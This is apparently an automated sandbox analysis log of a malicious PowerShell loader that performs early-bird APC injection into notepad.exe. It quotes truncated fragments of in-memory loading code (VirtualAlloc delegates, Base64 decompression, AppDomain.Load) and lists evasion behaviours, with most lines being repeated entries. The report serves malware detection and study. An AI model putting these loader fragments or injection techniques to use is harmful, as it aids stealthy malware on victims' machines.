              Source: 6.2.notepad.exe.1d8a4d1ce28.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              .NET source code contains potential unpacker
              Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack, Messages.cs.Net Code: Memory
              Source: 6.2.notepad.exe.1d8a4d1ce28.1.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 6.2.notepad.exe.1d8a4d1ce28.1.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: 6.2.notepad.exe.1d8a4d1ce28.1.raw.unpack, Messages.cs.Net Code: Memory
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$var_buffer = $var_va.Invoke([IntPtr]::Ze
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('My
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String(@"IyBPYmZ1c2NhdGVkIHVzaW5nIGh0dHBzOi8vZ2l0aHViLmNvbS9EQVJLTk9TWS9SdXNoLVBvd2VyU2hlbGwtT2JmdXNjYXRvciwgbWFkZSBieSBEQVJLTjAkWQoKJGRlY29kZWRTY3JpcHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVV

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeMemory allocated: 1D8A49F0000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\System32\notepad.exeMemory allocated: 1D8BCD10000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\notepad.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4248Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5416Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4040Thread sleep time: -11068046444225724s >= -30000sJump to behavior
              Source: C:\Windows\System32\notepad.exe TID: 4932Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\notepad.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\notepad.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\notepad.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Early bird code injection technique detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\System32\notepad.exeJump to behavior
              Hijacks the control flow in another process
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 2340 base: 1D8A2F5002E value: FFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 2340 base: 1D8A2F50086 value: FFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 2340 base: 1D8A2F500ED value: FFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 2340 base: 1D8A2F50163 value: FFJump to behavior
              Queues an APC in another process (thread injection)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\System32\notepad.exeJump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50001Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50002Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50003Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50004Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50005Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50006Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50007Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50008Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50009Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5000AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5000BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5000CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5000DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5000EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5000FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50010Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50011Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50012Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50013Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50014Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50015Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50016Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50017Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50018Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50019Jump to behavior
